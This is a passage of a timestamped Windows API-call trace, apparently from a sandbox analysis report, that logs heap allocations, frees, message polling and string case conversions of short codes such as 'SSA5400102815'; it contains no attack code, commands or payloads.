lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.976] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.976] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.977] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.978] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.978] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.979] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.979] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.979] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.980] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.980] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.980] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.980] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.981] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.981] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.981] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.982] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.982] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.983] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.984] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.984] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.984] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24df3c0 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: 